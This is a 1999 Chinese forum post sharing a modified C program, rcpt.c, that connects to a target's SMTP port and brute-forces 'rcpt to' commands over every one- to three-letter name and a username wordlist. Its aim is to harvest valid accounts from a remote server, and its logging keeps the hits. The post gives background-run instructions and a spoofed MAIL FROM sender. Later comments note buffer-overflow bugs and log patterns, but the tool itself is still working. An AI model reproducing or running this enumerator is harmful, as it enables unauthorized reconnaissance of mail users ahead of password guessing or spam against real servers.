发信人: deepin() 
整理人: williamlong(1999-05-14 17:16:41), 站内信件
对zer9的rcpt.c小小修改了一下,zer9不会介意吧? :-)
 虽然用暴力法,不过也不要太暴力了,呵呵.
 所以我把循环改成了3位,主要靠用户名字典来猜,其实命中率也是
 很高的,不然按照zer9的一秒猜一个,就算是4位,也要130个小时。虽然
 可以用多线程加快速度,可惜我还不会写 :( 本来还想把rcpt.log
 整理输出成用户名文件,可惜我太懒了 :)) RedHat5.2下通过.
 
        /* 通过"rcpt" 获得远程主机上的用户列表->/etc/passwd 
         *  thr0ugh "rcpt" gain rem0te server's user list   
         *                       by                                
         *                      zer9 
         *              Small modify by deepin
         *                 [email protected] 
         * 	          [email protected] 
         *      test on:slackware 2.0.34&irix6.4&Redhat5.2
         *               cc rcpt.c -o rcpt 
         *         后台运行:nohup ./rcpt <Target>& 
         *thanks zer9 ,he wrote the main program and i only modified a little :-)
         */     
                         
        #include <stdio.h> 
        #include <stdlib.h> 
        #include <string.h> 
        #include <netinet/in.h> 
        #include <sys/types.h> 
        #include <sys/stat.h> 
        #include <sys/time.h> 
        #include <fcntl.h> 
        #include <netdb.h> 
        #include <unistd.h> 
        #include <sys/socket.h> 
        #include <signal.h> 
        #include <ctype.h> 
        #include <arpa/inet.h> 
 
        #define  SMTPPORT   25              /* TCP port main() connects to */ 
        #define  VERSION     "0.081"        /* printed in the usage text and in ver()'s log banner */ 
        #define  LogFile    "./rcpt.log"    /* opened in append mode by main(); all replies of interest go here */
        #define  TIMEOUT    200             /* seconds passed to alarm() around each probe's recv() */ 
        #define  SleepTime  1               /* seconds main() sleeps after sending each probe */ 
 
        int ver(void); 
        int look_up(int sock,char *string,char *buff); 
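        /*
         * Send one SMTP command line: `string` followed by "\n".
         *
         * The line is assembled in a fixed 100-byte stack buffer.  snprintf()
         * bounds the copy, so a command longer than 98 characters is refused
         * instead of being written past the end of the buffer (the previous
         * strncpy/strncat pair copied strlen(string) bytes with no bound).
         *
         * sock   : connected socket to write to
         * string : NUL-terminated command text without line terminator
         * Returns 0 when the whole line was handed to send(), -1 when the line
         * did not fit or send() did not accept all of it.  Existing callers
         * ignore the return value, so this stays compatible with them.
         */
        int writeln(int sock,char *string) 
        { 
         char sendbuf[100]; 
         int n = snprintf(sendbuf,sizeof sendbuf,"%s\n",string); 
         if (n < 0 || (size_t)n >= sizeof sendbuf) 
         { 
          return -1;                        /* truncated: do not send a half command */ 
         } 
         ssize_t sent = send(sock,sendbuf,(size_t)n,0); 
         return (sent == n) ? 0 : -1; 
        } 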
 
        int s;                 /* socket to the target's SMTP port; used only by main() */ 
        FILE *fp,*wfp;         /* fp: log file (LogFile), written by main(), look_up() and ver();
                                  wfp: wordlist argv[2], read only by main() */
 
        /*
         * Entry point.  argv[1] is the target host name or dotted IPv4
         * address, argv[2] the username wordlist.  Connects to
         * argv[1]:SMTPPORT, requires "RCPT" in the server's HELP output,
         * sends RSET, HELO and MAIL FROM, then issues "rcpt to: <name>" for
         * every 1-, 2- and 3-letter lowercase name and for every
         * whitespace-separated wordlist token, passing each reply to
         * look_up(), which logs only replies containing "ent ok".
         * Returns 0 after the last probe, -1 on a usage, fopen, address or
         * connect error (the early -1 paths rely on process exit to close
         * whatever was already opened).
         *
         * Seen from the mail server, a run is one TCP session with a fixed
         * HELO name ("default"), a fixed MAIL FROM and one RCPT roughly every
         * second -- a stable pattern in MTA logs.  The run is only
         * informative when the server's RCPT reply differs for existing and
         * unknown recipients; a server that answers both the same way leaves
         * the log without any "ent ok" entries.
         */
        int main(int argc,char *argv[]) 
        { 
         struct sockaddr_in sin; 
         struct in_addr Target; 
         struct hostent *he; 
         char j;                                 /* unused */ 
         char recvbuf[1000],rcpt[200],a[8],hello_Target[500],word[10];  
         /* recvbuf: last server reply; rcpt: command being built; a: generated
          * name; word: current wordlist token (see the fscanf() note below) */ 
          
         if(argc!=3) 
          { 
           printf("Rcpt %s   by zer9[FTT]&deepin  mailto: [email protected] \n",VERSION); 
 
           printf("Usage: %s <Target> <WordlistFile> \n",argv[0]); 
           return -1;  
          } 
         if((fp=fopen(LogFile,"a+"))==NULL)     /* log is appended to, never truncated */ 
         { 
          perror("fopen"); 
          return -1;  
         } 
         if((wfp=fopen(argv[2],"r"))==NULL)
         {
          perror("fopen");
          return -1;
         }
         /* Name lookup first; on failure fall back to parsing a dotted quad.
          * IPv4 only: the address lands in an in_addr and the socket below
          * is AF_INET. */ 
         if((he=gethostbyname(argv[1]))!=NULL) 
         { 
          bcopy(he->h_addr,(char *)&Target.s_addr,he->h_length); 
         } 
         else 
          Target.s_addr=inet_addr(argv[1]); 
         if(Target.s_addr==-1)                   /* inet_addr() failure value (INADDR_NONE) */ 
          { 
           perror("gethostbyname"); 
           return -1;  
          } 
          ver();                                 /* banner into the log */ 
          fprintf(fp,"@Target: %s   ",argv[1]); 
          if((s=socket(AF_INET,SOCK_STREAM,0))<0) 
          { 
           perror("sock"); 
           return -1;  
          } 
          sin.sin_family=AF_INET; 
          sin.sin_port=htons(SMTPPORT); 
          sin.sin_addr.s_addr=Target.s_addr; 
          if(connect(s,(struct sockaddr*)&sin,sizeof(sin))<0) 
          { 
           perror("connect"); 
           return -1; 
          } 
         bzero(recvbuf,sizeof(recvbuf)); 
         bzero(rcpt,sizeof(rcpt)); 
         bzero(a,sizeof(a)); 
         fprintf(fp,"================================================== ======= 
        ======\n"); 
         /* Only this recv() is error-checked; every later recv() is unchecked,
          * so after a short or failed read the previous reply stays in recvbuf
          * unless it was bzero()ed first.  recv() never NUL-terminates: a
          * reply that fills all 1000 bytes leaves no terminator for the
          * strstr()/fprintf() calls that follow. */ 
         if(recv(s,recvbuf,sizeof(recvbuf),0)<0)       /* get Title */  
          { 
           perror("recv"); 
           return -1; 
          } 
         fprintf(fp,"%s\n",recvbuf); 
         writeln(s,"help"); 
         recv(s,recvbuf,sizeof(recvbuf),0);     /* recvbuf not cleared here: the banner may still be in it */ 
         fprintf(fp,"%s",recvbuf);  
         if(strstr(recvbuf,"RCPT")==NULL)       /* check RCPT */ 
         { 
          perror("no RCPT command. exit...");   /* perror() appends an unrelated errno text; fputs() to stderr would fit better */ 
          return -1; 
         } 
         fprintf(fp,"------------------------------------\n"); 
         bzero(recvbuf,sizeof(recvbuf)); 
         writeln(s,"RSET"); 
         recv(s,recvbuf,sizeof(recvbuf),0); 
         fprintf(fp,"%s",recvbuf); 
         strcpy(hello_Target,"HELO ");           /* always "HELO default" */ 
         strcat(hello_Target,"default"); 
         writeln(s,hello_Target); 
         recv(s,recvbuf,sizeof(recvbuf),0); 
         fprintf(fp,"%s",recvbuf); 
         bzero(recvbuf,sizeof(recvbuf)); 
         writeln(s,"mail from: [email protected]");     /*ma1l fr0m: zer9@fb i.gov*/ 
 
         recv(s,recvbuf,sizeof(recvbuf),0); 
         fprintf(fp,"%s",recvbuf); 
         fprintf(fp,"------------------------------------\n"); 
          
         /* 1bits: every single lowercase letter.
          * Each probe below: clear the buffers, build "rcpt to: <name>", arm
          * alarm(TIMEOUT), send, sleep SleepTime, read the reply, disarm, and
          * hand the reply to look_up().  No SIGALRM handler is installed
          * anywhere in this file, so a recv() that blocks for TIMEOUT seconds
          * ends the process with the signal's default action; look_up()
          * flushes the log after each completed probe, so only the trailing
          * lines of the run are lost in that case. */ 
         for(a[0]='a';a[0]<='z';a[0]++) 
         { 
          bzero(recvbuf,sizeof(recvbuf)); 
          bzero(rcpt,sizeof(rcpt)); 
          strncpy(rcpt,"rcpt to: ",9); 
          sprintf(a,"%c",a[0]);       /* source and destination are the same array (overlap is undefined); relies on a[0] being rewritten with its own value */ 
          strncat(rcpt,a,strlen(a)); 
          alarm(TIMEOUT); 
          writeln(s,rcpt); 
          sleep(SleepTime); 
          recv(s,recvbuf,sizeof(recvbuf),0); 
          alarm(0); 
          look_up(s,rcpt,recvbuf); 
         } 
 
        /* 2 bits: same probe sequence for every two-letter name */
        for(a[0]='a';a[0]<='z';a[0]++) 
         for(a[1]='a';a[1]<='z';a[1]++) 
         { 
          bzero(recvbuf,sizeof(recvbuf)); 
          bzero(rcpt,sizeof(rcpt)); 
          strncpy(rcpt,"rcpt to: ",9); 
          sprintf(a,"%c%c",a[0],a[1]);       /* same overlapping-sprintf pattern as above; also terminates a at a[2] */ 
          strncat(rcpt,a,strlen(a)); 
          alarm(TIMEOUT); 
          writeln(s,rcpt); 
          sleep(SleepTime); 
          recv(s,recvbuf,sizeof(recvbuf),0); 
          alarm(0); 
          look_up(s,rcpt,recvbuf); 
         } 
        /* 3 bits: same probe sequence for every three-letter name */
        for(a[0]='a';a[0]<='z';a[0]++) 
         for(a[1]='a';a[1]<='z';a[1]++) 
          for(a[2]='a';a[2]<='z';a[2]++) 
          { 
           bzero(recvbuf,sizeof(recvbuf)); 
           bzero(rcpt,sizeof(rcpt)); 
           strncpy(rcpt,"rcpt to: ",9); 
           sprintf(a,"%c%c%c",a[0],a[1],a[2]);      /* same overlapping-sprintf pattern; terminates a at a[3] */ 
           strncat(rcpt,a,strlen(a)); 
           alarm(TIMEOUT); 
           writeln(s,rcpt); 
           sleep(SleepTime); 
           recv(s,recvbuf,sizeof(recvbuf),0); 
           alarm(0); 
           look_up(s,rcpt,recvbuf); 
          }
           
        /*Read from WordsList: one whitespace-separated token per probe.
         * NOTE(review): word is 10 bytes but "%s" is unbounded, so any token
         * of 10 or more characters overflows this stack buffer; "%9s" would
         * bound it.  The fscanf() return value is not checked, and feof() is
         * tested after the read, so a final token not followed by a newline
         * sets EOF on the read and is never probed. */
        fscanf(wfp,"%s",word);
        while(!feof(wfp))
        {
           bzero(recvbuf,sizeof(recvbuf)); 
           bzero(rcpt,sizeof(rcpt)); 
           strncpy(rcpt,"rcpt to: ",9); 
           strncat(rcpt,word,strlen(word)); 
           alarm(TIMEOUT); 
           writeln(s,rcpt); 
           sleep(SleepTime); 
           recv(s,recvbuf,sizeof(recvbuf),0); 
           alarm(0); 
           look_up(s,rcpt,recvbuf); 
           fscanf(wfp,"%s",word);
        }
        
         fprintf(fp,"================================================== ======= 
        ====\n"); 
         fprintf(fp,"okay!\n\n\n\n\n"); 
         close(s);                               /* session is dropped without an SMTP QUIT */ 
         fclose(wfp);
         fclose(fp); 
         return 0; 
         } 
          
          
        /*
         * Record a positive probe reply in the log.
         *
         * sock and string are part of the call signature but are not used;
         * only the server reply `buff` is examined.  A reply containing
         * "ent ok" (e.g. sendmail 8.8.7's "Recipient ok") is appended to fp.
         * The log is flushed on every call, hit or not, so results written so
         * far survive an abrupt exit.  Always returns 0.
         */
        int look_up(int sock,char *string,char *buff) 
        { 
         (void)sock; 
         (void)string; 
         const char *hit = strstr(buff,"ent ok"); 
         if (hit != NULL) 
         { 
          fputs(buff,fp); 
         } 
         fflush(fp); 
         return 0; 
        } 
             
        /*
         * Write the run header to the log file fp: a separator line followed
         * by the tool name, VERSION and author contact.  Always returns 0.
         */
        int ver(void) 
        { 
         static const char separator[] = "\n###############################\n"; 
         fputs(separator,fp); 
         fprintf(fp,"Rcpt %s   by zer9[FTT]&deepin  mailto: [email protected] om\n",VERSION); 
         return 0; 
        } 